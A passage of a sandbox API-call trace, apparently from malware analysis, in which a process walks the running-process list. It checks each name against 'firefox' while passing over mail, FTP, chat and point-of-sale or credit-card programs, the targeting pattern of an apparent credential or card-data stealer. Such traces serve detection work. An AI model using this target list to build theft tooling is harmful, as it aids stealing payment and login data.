th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0095.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.035] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572558 [0095.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3572558, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0095.035] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0095.035] StrStrIA (lpFirst="operamail.exe", lpSrch="firefox") returned 0x0 [0095.035] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0095.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.036] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572540 [0095.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3572540, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0095.036] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0095.036] StrStrIA (lpFirst="outlook.exe", lpSrch="firefox") returned 0x0 [0095.036] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0095.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.037] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572570 [0095.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3572570, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0095.037] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0095.037] StrStrIA (lpFirst="pidgin.exe", lpSrch="firefox") returned 0x0 [0095.037] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0095.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.039] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572618 [0095.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572618, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0095.039] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0095.039] StrStrIA (lpFirst="scriptftp.exe", lpSrch="firefox") returned 0x0 [0095.039] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0095.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.040] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572528 [0095.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3572528, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0095.040] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0095.040] StrStrIA (lpFirst="skype.exe", lpSrch="firefox") returned 0x0 [0095.040] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0095.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.041] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572720 [0095.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572720, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.041] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0095.041] StrStrIA (lpFirst="smartftp.exe", lpSrch="firefox") returned 0x0 [0095.042] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0095.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.043] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35726c0 [0095.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x35726c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0095.043] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0095.043] StrStrIA (lpFirst="thunderbird.exe", lpSrch="firefox") returned 0x0 [0095.043] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0095.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.044] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35725d0 [0095.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x35725d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0095.044] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0095.044] StrStrIA (lpFirst="totalcmd.exe", lpSrch="firefox") returned 0x0 [0095.044] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0095.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.045] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572588 [0095.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3572588, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0095.046] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0095.046] StrStrIA (lpFirst="trillian.exe", lpSrch="firefox") returned 0x0 [0095.046] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0095.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.057] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572630 [0095.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3572630, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0095.057] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0095.057] StrStrIA (lpFirst="webdrive.exe", lpSrch="firefox") returned 0x0 [0095.057] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0095.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.059] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572648 [0095.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3572648, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.059] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0095.059] StrStrIA (lpFirst="whatsapp.exe", lpSrch="firefox") returned 0x0 [0095.059] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0095.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.060] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572708 [0095.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3572708, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0095.061] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0095.061] StrStrIA (lpFirst="winscp.exe", lpSrch="firefox") returned 0x0 [0095.061] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0095.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.063] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356cf28 [0095.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x356cf28, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0095.064] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0095.064] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="firefox") returned 0x0 [0095.064] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0095.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.066] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35747e8 [0095.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x35747e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0095.066] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0095.066] StrStrIA (lpFirst="active-charge.exe", lpSrch="firefox") returned 0x0 [0095.066] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0095.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.067] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572660 [0095.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3572660, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0095.067] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0095.067] StrStrIA (lpFirst="accupos.exe", lpSrch="firefox") returned 0x0 [0095.067] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0095.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.069] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35726d8 [0095.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x35726d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0095.069] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0095.069] StrStrIA (lpFirst="afr38.exe", lpSrch="firefox") returned 0x0 [0095.069] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0095.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.071] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572510 [0095.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3572510, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0095.071] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0095.071] StrStrIA (lpFirst="aldelo.exe", lpSrch="firefox") returned 0x0 [0095.112] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0095.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0095.114] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3572768 [0095.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3572768, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0095.114] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0095.114] StrStrIA (lpFirst="ccv_server.exe", lpSrch="firefox") returned 0x0 [0095.114] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0095.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0095.117] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3574728 [0095.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3574728, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0095.117] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0095.117] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="firefox") returned 0x0 [0095.117] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0095.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.118] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3574548 [0095.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3574548, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0095.118] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0095.118] StrStrIA (lpFirst="creditservice.exe", lpSrch="firefox") returned 0x0 [0095.118] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0095.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.120] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35725b8 [0095.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x35725b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0095.120] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0095.120] StrStrIA (lpFirst="edcsvr.exe", lpSrch="firefox") returned 0x0 [0095.120] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0095.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.121] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3572678 [0095.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3572678, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0095.121] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0095.121] StrStrIA (lpFirst="fpos.exe", lpSrch="firefox") returned 0x0 [0095.121] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0095.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.123] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35725a0 [0095.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35725a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0095.123] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0095.123] StrStrIA (lpFirst="isspos.exe", lpSrch="firefox") returned 0x0 [0095.123] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0095.124] 